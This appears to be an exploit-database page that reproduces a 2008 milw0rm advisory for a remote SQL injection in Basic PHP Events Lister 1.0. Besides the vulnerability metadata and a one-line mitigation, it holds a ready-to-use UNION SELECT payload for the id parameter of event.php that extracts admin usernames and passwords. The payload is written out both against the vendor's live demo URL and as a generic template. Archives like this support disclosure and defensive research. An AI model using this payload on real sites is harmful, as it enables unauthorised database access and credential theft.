header-logo
Suggest Exploit
vendor:
Basic PHP Events Lister
by:
0x90
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Basic PHP Events Lister
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE: N/A
CPE: a:mevin:basic_php_events_lister
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Basic PHP Events Lister Remote SQL Injection

A SQL injection vulnerability exists in Basic PHP Events Lister, which allows remote attackers to execute arbitrary SQL commands via the id parameter in a event.php request.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

       _____          ____   _____
      /  _  \ /\  /\ / _  \ /  _  \
      | | | | \ \/ / ||_| | | | | |  
      | | | |  \  /  \_   | | | | |  
      | |_| |  /  \   __\ | | |_| |
      \_____/ / /\ \ |____/ \_____/
              \/  \/

[~] Basic PHP Events Lister Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: Basic PHP Events Lister

[~] site: http://www.mevin.com

[~] Donload: http://www.mevin.com/downloads/Basic-php-events-lister1.0.zip

[~] Vulnerability Class: SQL Injection

[~] Online Demostration: http://www.mevin.com/downloads/events/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--



[~] Exploit:

http://host/event.php?id=-0x90+union+select+0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,concat(uname,0x3a,pword),0x90+from+admin--

# milw0rm.com [2008-09-21]